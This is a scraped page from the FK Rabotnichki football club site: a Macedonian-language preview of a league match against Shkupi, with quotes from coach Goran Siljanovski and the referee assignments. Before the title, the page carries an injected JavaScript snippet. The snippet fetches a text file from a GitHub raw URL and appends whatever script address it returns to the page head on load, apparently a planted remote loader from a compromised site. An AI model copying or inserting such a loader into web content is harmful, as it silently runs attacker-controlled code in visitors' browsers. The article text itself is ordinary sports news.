;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Силјановски: Шкупи е цврст ривал, ако брзо ги пробиеме – ќе биде полесно
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Силјановски: Шкупи е цврст ривал, ако брзо ги пробиеме – ќе биде полесно

Работнички утре (14.30 часот) го пречекува Шкупи на арената „Филип Втори“, во натпревар од 11.коло во Првата фудбалска лига. Првиот дуел на „Чаир“ оваа сезона го доби Работнички со 0-1, но Горан Силјановски е свесен дека нашиот тим го очекува еден тежок и неизвесен натпревар.

„Шкупи е незгоден противник за нас. Неколку мечеви наназад, се сеќавам дека постојано сме ремизирале, а победивме оваа сезона на Чаир. Се надеваме дека и утре ќе стигнеме до триумф, иако тоа нема да биде нималку лесно. Шкупи е цврст ривал, умее добро и организирано да се брани, а опасно се заканува преку контранапади. Мислам дека ако брзо ги пробиеме, први да постигнеме гол во раната фаза од мечот, потоа ќе биде полесно за нас. Ако тоа не биде случај, тогаш нивната самодоверба ќе се зголемува во текот на дуелот. Ние ќе ја играме нашата игра, офанзивно, со желба да постигнеме гол повеќе, и се надеваме дека ќе ги освоиме трите бода. Секако, ќе треба да внимаваме во одбраната, со максимална конкцентрација за да не бидеме изненадени, затоа што видовме против Македонија ЃП колку е тешко подоцна, ако прв примиш погодок“, вели Горан Силјановски.

Утрешниот натпревар на арената „Филип Втори“ ќе го суди Марјан Маркоски од Охрид, а ќе му помагаат Жарко Тодоровски (Охрид) и Ацо Мацевски (Струга). Четврти судија е Марјан Стојановски (Кичево). Делегат на натпреварот ќе биде Јовче Попоски (Охрид).